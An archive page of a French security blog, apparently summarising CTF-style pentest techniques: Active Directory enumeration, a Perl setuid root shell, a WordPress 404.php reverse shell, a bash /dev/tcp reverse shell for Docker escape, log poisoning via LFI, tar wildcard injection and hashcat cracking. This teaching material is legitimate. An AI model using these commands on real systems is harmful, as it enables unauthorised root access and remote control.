Sécuriser votre site

Connaître son ennemi
Menu
  • Active Directory
  • Aide-mémoire
  • Antivirus
  • Apparmor
  • Backdoor
  • Enfants
  • Engin de recherche
  • Énumération
  • Exploit
  • Liens
  • Linux
  • Non classé
  • OSINT
  • Powershell
  • Python
  • Ruby
  • Shells
  • Transfert de fichiers
  • Utilitaire
  • Virus
    • Analyse
    • VM
  • Windows
  • Windows Server

Mois : juin 2021

Exploration d’un ActiveDirectory avec nmap , smbclient, GetNPUsers.py, kerbrute et enum4linux

Exploration d’un ActiveDirectory avec nmap , smbclient, GetNPUsers.py, kerbrute et enum4linux

Il est possible de prendre possession d’un ActiveDiectory si nous réussissons à cracker le mot de passe de l’administrateur. On commence par énumérer les services présents sur le AD r0cker@kali:~$ sudo nmap -p- -A -nP 10.10.74.213 Starting Nmap 7.91 ( https://nmap.org ) at 2021-06-28 07:17 EDT …
Full Article
Pas de commentaire
Obtenir le compte administrateur avec Perl

Obtenir le compte administrateur avec Perl

Voilà un astuce en exécutant le script linpeas, vous remarque que perl apparaît avec les “capabilities”: cap_setuid+ep set vous pouvez obtenir un shell root perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/sh";' Vous pouvez aussi donner à Perl cette capacité: cp $(which perl) . sudo setcap …
Full Article
Pas de commentaire
Exploiter windows server avec PrintSpooler

Exploiter windows server avec PrintSpooler

Il existe quelques exploits populaires pour Windows server. Entre autres, Rotten Potato et PrintSpooler. Voici une introduction brève pour l’export PrintSpooler Si vous avez les droits SeImersonatePrivilege ou SeAssignPrimaryTokenPrivilege, vous devriez pouvoir exploiter Windows et obtenir les droits AUTHORITY\SYSTEM whoami /priv PRIVILEGES INFORMATION ---------------------- Privilege Name                Description                               …
Full Article
Pas de commentaire
Uploader un shell dans wordpress

Uploader un shell dans wordpress

On modifie le fichier 404.php du thème par le php-reverse-shell.php (on édite l’adresse IP et le port de la machine de l’attaquant, sinon il faudra POSTer ces variables) On pet par la suite y accéder https://10.10.251.62/wp-content/themes/twentyfifteen/404.php
Full Article
Pas de commentaire
Sortir d’un container docker

Sortir d’un container docker

Nous pouvons voir que nous sommes dans un docker en allant dans /opt/backups Nous pouvons sortir en écrasant backup.sh echo “#!/bin/bash” > backup.sh echo “/bin/bash -c ‘bash -i >& /dev/tcp//1234 0>&1′” >> backup.sh Il existe aussi des scripts d’énumération des dockers Voir la vulnérabilité CVE-2019-14271 parfois …
Full Article
Pas de commentaire
Réécriture du PATH pour obtenir davantage d’accès

Réécriture du PATH pour obtenir davantage d’accès

Lorsque qu’un programme s’exécute avec les droits du propriétaire (SUID), il est peut être possible de modifier le chemin d’accès PATH pour que celui exécute autre chose que ce qui était prévu au départ r0cker@ubuntu:~/secret$ ls -lsa ls -lsa total 40 4 drwxrwx--- 2 r0cker r0cker  4096 …
Full Article
Pas de commentaire
Log poisoning

Log poisoning

Cette technique d’infiltration se résume à exécuter une commande et à lire le résultat dans le fichier journal du serveur web. La commande s’injecte via le User-Agent. http://www.vulnerable.com/test.php?view=/var/www/html/development_testing/.././.././../log/apache2/access.log&cmd=ls On remarquera qu’ici le serveur est vulnérable à l’inclusion local de fichier (LFI) et que le script filtre …
Full Article
Pas de commentaire
Cracker des hash avec hashcat

Cracker des hash avec hashcat

Si on veut déterminer le type de hash à cracker, on se réfère à https://hashcat.net/wiki/doku.php?id=example_hashes. On trouve le hash mode dans la liste. hashcat -m 1600 hash rockyou.txt
Full Article
Pas de commentaire
rlwrap : Améliorer l’interaction avec l’utilitaire netcat (nc)

rlwrap : Améliorer l’interaction avec l’utilitaire netcat (nc)

Rlwrap est un petit utilitaire qui s’intégre à d’autres outils qui utilisent readline. Son but est de permettre l’édition avant l’envoi au serveur et permettre aussi de conserver une historique. Voici comment on peut l’utiliser simplement: rlwrap nc -nlvp 4444
Full Article
Pas de commentaire
Vulnérabilité dûe à l’expansion du shell (exemple avec l’utilitaire tar)

Vulnérabilité dûe à l’expansion du shell (exemple avec l’utilitaire tar)

Lorsqu’on utilise le caractère * dans une commande shell, celui-ci signifie “tous les fichiers” Lorsqu’on administrateur utilise une commande tar (ou possiblement d’autres), il faut faire attention, car il y a des options pour obtenir un shell listés suf gtfobins --checkpoint=1 --checkpoint-action=exec=/bin/sh Donc en créant ces …
Full Article
Pas de commentaire

Navigation des articles

1 2 3 Next

Articles populaires

blogs chercher de façon différente code Enfants engin de recherche engins de recherche entreprises fils de discussion flare forums inetsim InfluxDB installation IOT' internet des objets kids meta médias sociaux OSINT pays personnes programmation recherche REMnux semblable site sock puppet xclip

  • Active Directory
  • Aide-mémoire
  • Analyse
  • Antivirus
  • Apparmor
  • Backdoor
  • Enfants
  • Engin de recherche
  • Énumération
  • Exploit
  • Liens
  • Linux
  • Non classé
  • OSINT
  • Powershell
  • Python
  • Ruby
  • Shells
  • Transfert de fichiers
  • Utilitaire
  • Virus
  • VM
  • Windows
  • Windows Server

Articles récents

  • L’importance de la sécurité informatique dans une petite entreprise
  • L’importance d’embaucher un spécialiste de la sécurité informatique
  • L’importance de la sécurité informatique dans une petite et moyenne entreprise
  • Activation des journaux (logs) de Windows pour la détection de virus en mémoire
  • Engin de recherche pour le contenu sur telegram

Archives

  • février 2023
  • novembre 2022
  • juillet 2022
  • avril 2022
  • mars 2022
  • septembre 2021
  • août 2021
  • juillet 2021
  • juin 2021
  • mai 2021

Sécuriser votre site

Connaître son ennemi
Copyright © 2023 Sécuriser votre site
Article par

Ad Blocker Detected

Our website is made possible by displaying online advertisements to our visitors. Please consider supporting us by disabling your ad blocker.

Refresh
Gérer le consentement aux témoins
Nous utilisons des technologies telles que les témoins pour stocker et/ou accéder aux informations relatives aux appareils. Nous le faisons pour améliorer l’expérience de navigation et pour afficher des publicités personnalisées. Consentir à ces technologies nous permettra de traiter des données telles que le comportement de navigation ou les identifiants uniques sur ce site. Le fait de ne pas consentir ou de retirer son consentement peut avoir un effet négatif sur certaines fonctionnalités et caractéristiques.
Fonctionnel Toujours activé
Le stockage ou l’accès technique est strictement nécessaire dans la finalité d’intérêt légitime de permettre l’utilisation d’un service spécifique explicitement demandé par l’abonné ou l’utilisateur, ou dans le seul but d’effectuer la transmission d’une communication sur un réseau de communications électroniques.
Préférences
Le stockage ou l’accès technique est nécessaire dans la finalité d’intérêt légitime de stocker des préférences qui ne sont pas demandées par l’abonné ou l’utilisateur.
Statistiques
Le stockage ou l’accès technique qui est utilisé exclusivement à des fins statistiques. Le stockage ou l’accès technique qui est utilisé exclusivement dans des finalités statistiques anonymes. En l’absence d’une assignation à comparaître, d’une conformité volontaire de la part de votre fournisseur d’accès à internet ou d’enregistrements supplémentaires provenant d’une tierce partie, les informations stockées ou extraites à cette seule fin ne peuvent généralement pas être utilisées pour vous identifier.
Marketing
Le stockage ou l’accès technique est nécessaire pour créer des profils d’utilisateurs afin d’envoyer des publicités, ou pour suivre l’utilisateur sur un site web ou sur plusieurs sites web ayant des finalités marketing similaires.
Gérer les options Gérer les services Gérer les fournisseurs En savoir plus sur ces finalités
Voir les préférences
{title} {title} {title}